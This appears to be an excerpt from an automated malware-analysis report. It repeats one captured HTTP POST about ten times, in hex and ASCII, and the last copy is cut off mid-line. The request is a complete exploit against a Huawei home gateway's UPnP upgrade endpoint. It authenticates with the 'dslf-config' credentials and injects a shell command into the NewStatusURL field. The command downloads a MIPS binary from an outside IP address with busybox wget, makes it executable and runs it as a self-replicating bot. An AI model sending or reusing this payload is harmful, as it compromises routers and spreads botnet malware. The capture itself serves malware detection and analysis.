              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 